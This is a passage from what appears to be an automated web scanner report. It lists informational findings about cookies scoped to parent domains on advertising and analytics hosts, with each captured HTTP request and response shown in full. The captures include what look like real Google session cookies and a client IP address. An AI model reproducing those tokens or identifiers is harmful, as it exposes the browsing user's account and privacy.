Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316221548433_135109402_as3106_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 01:05:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:05:48 GMT
Content-Length: 2744

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316221548433_135109402_as3106_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316221548433_135109402_as3
...[SNIP]...

11.40. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316221519820_135153353_as3104_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316221519820_135153353_as3104_imp/vew?q=H4sIAAAAAAAAAFWPMW7DMAxFr0JSFEUB2jll6FokOkJRuTESoChgOHZhFHFyr56udJulmz75__vU_MHffQECDISZkbNa322DFAIwaA5oy_x_UIEYmIipDp1HY12uzYbjgxNYWUnttUyjRyOhQkI-2NRcJlXxInLZuRQFRTjY-9LG2zwV4YBysPk6FGe5aXBTiIwhqG6My_FcWBIIZFvupzLfjpd1Gtdl_LKX1i_lGRhTFoS9tc_HSZAjAUVrhSTa2vpzebq99etwn60r-AgmAYiR894dp6kEBKioFVL1B2ENYkvnfEdRShpRRHdbAQqp_xLD7m_HvzvZVIRI6uUx7u0HOPLtj20BAAA=&act=vew&idx=[0]&rnd=1979613396&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221519820_135153353_as3104_imp|374#1316221519820_135153353_as3104_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316223879885_63879647_as3102_vew|374#1316223878425_135346010_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 01:44:39 GMT; Path=/tase
Date: Sat, 17 Sep 2011 01:44:39 GMT


11.41. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316221548433_135109402_as3106_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316221548433_135109402_as3106_imp/vew?q=H4sIAAAAAAAAAFWPMW7DMAxFD9ELkJRE0YB2Thm6Bo6OUFSujQQoChiO3QpFnFy9dOulE_XEz__Jr4_DU-3SEQiIYpSAzHIwQmQSQkF3-Ov53x5vFCCQBKuh1SFtYkfYePSNaPncP6AxBQV9KUNNx8hgct-0upbznBwCZJQMMduDMDvWkoiD1mWbj86BD-ZAGcgDWrbLY2fGMddb0S6hjv2e5Lx4IdH6OKfl3l_XeVrr9G1JwyU939-GdXwsOnT_jffFwGNsGKHV1zRPlh7saIjoTzoXwyjCdhoZdoYsIAgnfa9lui9zYu-QT7rcxmSrmGg0kQsenRPZPK79JXmOwNDoDyUMaFVtAQAA&act=vew&idx=[0]&rnd=1979642060&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221548433_135109402_as3106_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316223959550_135292850_as3105_vew|374#1316223940878_135291324_as3105_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 01:45:59 GMT; Path=/tase
Date: Sat, 17 Sep 2011 01:45:59 GMT


11.42. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d775029/8/923517/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:11 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a204
Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 00:53:10 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-2; expires=Tue, 06-Nov-2012 16:53:11 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-o; expires=Tue, 06-Nov-2012 16:53:11 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.43. http://apis.google.com/js/plusone.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4; NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; S=sorry=DF9qBZyty5yjGD3jvSxv1g

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRj6f-4AUlLipUgWN_wuO6t53nd9JmxbvZ_W-1oR-8-SaiPAdXRK4JXUtEp2wFxov7L7K2IUs0NN_D7fbCnl5hOor_vWa1l8eIYTgMZ62Ta0zFpO49zlHFwKxdLGNyk7lE5-OxMDws0Cv_cRzInX9ya84yTO0ELIyf4zh8DDmuFQtxahrdU1xrdlb6R-4-435VlRnljnEs8kNKwcSUW1o1Tnk3osBq0wHG-5tjyF7bmNf25vklS_SBSrTiYAeu-qLWAvysK-50K_ALHzITRWPKomo-6Dw-NTco8CdlnVBznEfI;Domain=.google.com;Path=/;Expires=Tue, 14-Sep-2021 00:52:21 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sat, 17 Sep 2011 00:52:21 GMT
Date: Sat, 17 Sep 2011 00:52:21 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5519

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23803279-4555db52';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

11.44. http://ar.voicefive.com/b/recruitBeacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p109848095&PRAd=70982068&AR_C=43901049 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Sat, 17 Sep 2011 01:05:23 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221523; expires=Sun 18-Sep-2011 01:05:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p109848095=exp=2&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 01:05:23 2011&prad=70982068&arc=43901049&; expires=Fri 16-Dec-2011 01:05:23 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p109848095&c3=70982068&c4=43901049&c5=&c6=2&c7=Sat%20Sep%2017%2000%3A57%3A53%202011&c8=&c9=&c10=&c15=&rn=1316221523
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0


11.45. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1316220781.709,wait-%3E10000,&1316238867280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_G=method->-1,ts->1316220781; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:39 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

11.46. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p63514475&PRAd=348445181&AR_C=233006068 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=2&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:32 2011&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29309

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...

11.47. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1316220475506&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Fwww.actvalue.com%252F%26r%3Dhttp%253A%252F%252Fwww.radius-server.net%252Faradial-radius-server-billing-partners-inner.html&c9=http%3A%2F%2Fwww.actvalue.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fwww.actvalue.com%2F&r=http%3A%2F%2Fwww.radius-server.net%2Faradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 16 Sep 2011 19:47:00 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Sun, 15-Sep-2013 19:47:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


11.48. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=1&c2=7395021&c3=&c4=&c5=01&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 01:00:31 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 01:00:31 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

11.49. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3005004&d.c=gif&d.o=wdgabccom&d.x=83677928&d.t=page&d.u=http%3A%2F%2Fbeta.abc.go.com%2Fshows%2Fcharlies-angels%2Fbios&d.r=http%3A%2F%2Fbeta.abc.go.com%2Fshows%2Fcharlies-angels HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 00:58:02 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 16-Sep-2013 00:58:02 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

11.50. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p63514475&c3=348445181&c4=233006068&c5=1&c6=1&c7=Sat%20Sep%2017%2000%3A53%3A01%202011&c8=http%3A%2F%2Fomg.yahoo.com%2Fxhr%2Fad%2FLREC%2F2115823648%3Fref%3DaHR0cDovL3d3dy55YWhvby5jb20v%26token%3Db475da4881df940801d7698aa9d116ab&c9=&c10=http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203&c15=&1316238866586 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_G=method->-1,ts->1316220781; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 17 Sep 2011 00:54:32 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Mon, 16-Sep-2013 00:54:32 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


11.51. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p109848095&c3=70982068&c4=43901049&c5=&c6=1&c7=Sat%20Sep%2017%2000%3A57%3A53%202011&c8=&c9=&c10=&c15=&rn=1316221073 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 17 Sep 2011 01:05:33 GMT
Connection: close
